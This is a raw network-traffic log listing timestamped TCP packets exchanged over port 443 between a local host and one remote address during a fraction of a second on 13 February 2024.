Feb 13, 2024 21:13:54.637096882 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.637113094 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.637156963 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.637164116 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.637214899 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.637214899 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.638695002 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.638710022 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.638746023 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.638752937 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.638797045 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.638797998 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.641328096 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.641354084 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.641433954 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.641433954 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.641444921 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.641530037 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.643078089 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.643095016 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.643141985 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.643161058 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.643233061 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.643233061 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.645441055 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.645457029 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.645510912 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.645530939 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.645564079 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.645564079 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.647171021 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.647188902 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.647243023 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.647265911 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.647486925 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.649573088 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.649599075 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.649660110 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.649681091 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.649715900 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.649715900 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.651483059 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.651499987 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.651552916 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.651571989 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.653893948 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.653917074 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.653939962 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.653995991 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.654006004 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.656275988 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.656300068 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.656337976 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.656337976 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.656349897 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.656400919 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.656400919 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.658246994 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.658262014 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.658317089 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.658337116 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.658469915 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.660150051 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.660165071 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.660237074 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.660237074 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.660245895 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.660279989 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.662153006 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.662167072 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.662216902 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.662233114 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.663285017 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.663829088 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.663846970 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.663891077 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.663897991 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.663948059 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.663953066 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.664061069 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.665469885 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.665487051 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.665545940 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.665551901 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.665595055 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.667227983 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.667246103 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.667284966 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.667290926 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.667323112 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.667488098 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.668735981 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.668751001 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.668930054 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.668930054 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.668956041 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.669050932 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.670420885 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.670438051 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.670486927 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.670495033 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.670605898 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.671395063 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.671411991 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.671482086 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.671482086 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.671489954 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.671534061 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.673141956 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.673160076 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.673228979 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.673228979 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.673235893 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.673280954 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.674824953 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.674841881 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.675844908 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.675853014 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.675967932 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.676670074 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.676686049 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.676748037 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.676755905 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.676799059 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.677640915 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.677660942 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.677726030 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.677726984 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.677733898 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.677772045 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.679415941 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.679434061 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.679506063 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.679506063 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.679512978 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.679573059 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.681121111 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.681137085 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.681878090 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.681890011 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.681958914 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.682811022 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.682826996 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.682929039 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.682936907 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.683603048 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.684636116 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.684650898 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.684735060 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.684741974 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.685631037 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.685640097 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.685647011 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.685709000 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.685782909 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.685782909 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.685790062 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.685833931 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.687401056 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.687428951 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.687489033 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.687498093 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.687508106 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.687537909 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.689117908 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.689135075 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.689199924 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.689199924 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.689205885 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.689352989 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.690732002 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.690747976 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.690805912 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.690813065 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.692478895 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.692497969 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.692507029 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.692512989 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.692559958 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.692559958 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.693703890 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.693720102 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.693873882 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.693881989 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.693933010 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.695355892 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.695370913 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.695436001 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.695436001 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.695444107 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.695585012 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.697081089 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.697097063 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.697165012 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.697165012 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.697173119 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.697216034 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.698733091 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.698753119 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.698801994 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.698808908 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.698852062 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.698852062 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.699870110 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.699887037 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.699954033 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.699954033 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.699959993 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.700004101 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.701554060 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.701570988 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.701617002 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.701622963 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.701668024 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.701668024 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.703267097 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.703286886 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.703356028 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.703356028 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.703362942 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.703435898 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.705024004 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.705044985 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.705116987 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.705116987 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.705125093 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.705214024 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.706640005 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.706655979 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.706703901 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.706710100 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.706727982 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.707488060 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.708376884 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.708390951 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.708456039 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.708456039 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.708462954 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.708508015 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.727358103 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.727389097 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.727452993 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.727459908 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.727488995 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.727595091 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.727976084 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.728003025 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.728070021 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.728070021 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.728076935 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.728147030 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.729847908 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.729872942 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.729957104 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.729957104 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.729969025 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.730052948 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.731698990 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.731720924 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.731785059 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.731785059 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.731794119 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.731993914 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.732641935 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.732662916 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.732697010 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.732707977 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.732748032 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.732748032 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.734554052 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.734577894 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.734610081 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.734623909 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.734662056 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.734662056 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.735938072 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.735955954 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.735996008 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.736002922 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.736037970 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.736037970 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.737293005 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.737310886 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.737344980 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.737356901 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.737392902 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.737477064 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.738616943 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.738637924 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.738701105 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.738701105 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.738709927 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.738888025 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.740303040 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.740319967 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.740379095 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.740379095 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.740386009 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.740427017 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.741393089 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.741410017 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.741471052 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.741471052 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.741477966 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.741544962 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.743129015 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.743146896 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.743201017 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.743207932 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.743273973 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.744882107 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.744899988 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.744949102 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.744954109 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.744991064 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.746043921 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.746062994 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.746105909 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.746119022 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.746233940 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.747208118 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.747231007 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.747287035 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.747287035 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.747292042 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.747334003 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.748960018 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.748980999 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.749094963 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.749102116 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.749219894 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.750848055 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.750864983 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.750905037 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.750920057 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.750955105 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.752207994 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.752223969 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.752257109 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.752271891 CET	443	49701	172.67.215.45	192.168.2.6
